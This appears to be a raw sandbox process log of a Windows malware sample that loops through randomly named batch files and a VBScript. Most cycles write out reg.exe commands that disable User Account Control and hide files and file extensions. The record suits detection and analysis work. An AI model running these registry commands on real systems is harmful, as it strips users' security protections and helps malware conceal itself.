C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EqkwMEgU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ksEMookw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kuwIQIMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUQAssUU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DMAkAEwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pycgkkYE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqkcgUgw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYoAkEQY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QiwwYUQw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eosYYowE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UgEcwAwU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LqQEIowc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pywccMsw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwocgcIY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HQUoIQQo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TYEIkwkc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wGQosEYY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cQgAUwMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sQgEYEMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UIQAkcwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tcgMYcwM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fYcQMYkk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zqkgwQoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yOUEEYgM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oCUggIIM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\asUUAIQY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MUIAwMUA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\REsMccoc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bSwQwMEI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bgcwIAUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
